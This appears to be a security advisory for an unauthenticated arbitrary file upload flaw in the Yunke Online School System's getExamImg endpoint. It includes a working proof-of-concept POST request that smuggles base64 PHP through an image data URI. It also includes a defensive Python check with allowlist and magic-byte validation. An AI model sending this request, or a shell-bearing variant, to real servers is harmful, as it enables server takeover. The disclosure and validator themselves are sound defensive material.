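Vulnerability Description
The Yunke Online School System (云课网校系统) has an arbitrary file upload vulnerability in the /index/Exam/getExamImg endpoint. An unauthenticated attacker can exploit it to upload a malicious script file and thereby take control of the entire server.
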
POST /index/Exam/getExamImg HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

src_data=data:image/php;base64,PD9waHAgZWNobyBtZDUoIkRWVUNlTVpHIik7dW5saW5rKF9fRklMRV9fKTs/Pg==
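
A server-side or WAF-side check for the src_data parameter shown in the request above, as an added example that is not code from the original page or from the affected product. The function names, the allowlist and the constructed samples are assumptions. That the handler trusts the image subtype declared in the data URI is inferred from the `data:image/php` value in the request.

```python
import base64
import re
from urllib.parse import parse_qs, quote

ALLOWED = {  # assumed allowlist: image subtypes and their leading magic bytes
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
DATA_URI = re.compile(r"^data:image/([A-Za-z0-9.+-]+);base64,(.*)$", re.S)

def inspect_src_data(form_body: str) -> list:
    """Return the reasons to reject src_data; an empty list means it passed."""
    values = parse_qs(form_body, keep_blank_values=True, separator="&").get("src_data")
    if not values:
        return ["src_data missing"]
    m = DATA_URI.match(values[0])
    if not m:
        return ["not a base64 image data URI"]
    # An unescaped '+' in a form body is decoded as a space; undo that.
    subtype, b64 = m.group(1).lower(), m.group(2).replace(" ", "+")
    reasons = []
    if subtype not in ALLOWED:
        reasons.append(f"subtype '{subtype}' is not an allowed image type")
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:
        return reasons + ["payload is not valid base64"]
    # The declared type is client-controlled, so check the bytes themselves.
    magic = ALLOWED.get(subtype)
    if magic is None or not blob.startswith(magic):
        reasons.append("content lacks the signature of an allowed image type")
    if b"<?php" in blob.lower():
        reasons.append("content embeds a PHP open tag")
    return reasons

def make_body(subtype: str, raw: bytes) -> str:
    """Build a constructed form body shaped like the request on this page."""
    uri = f"data:image/{subtype};base64," + base64.b64encode(raw).decode()
    return "src_data=" + quote(uri, safe="")

# Body taken verbatim from the request on this page.
PAGE_BODY = "src_data=data:image/php;base64,PD9waHAgZWNobyBtZDUoIkRWVUNlTVpHIik7dW5saW5rKF9fRklMRV9fKTs/Pg=="
# Constructed samples: a bare PNG header, and a PNG header followed by PHP.
PNG_BODY = make_body("png", ALLOWED["png"] + b"\x00" * 8)
POLYGLOT_BODY = make_body("png", ALLOWED["png"] + b"<?php echo 1;?>")

if __name__ == "__main__":
    for name, body in [("page", PAGE_BODY), ("png", PNG_BODY), ("polyglot", POLYGLOT_BODY)]:
        print(name, inspect_src_data(body) or "ok")
```

A handler that passes this check should still choose the stored file name and extension itself and write to a directory where scripts are not executed.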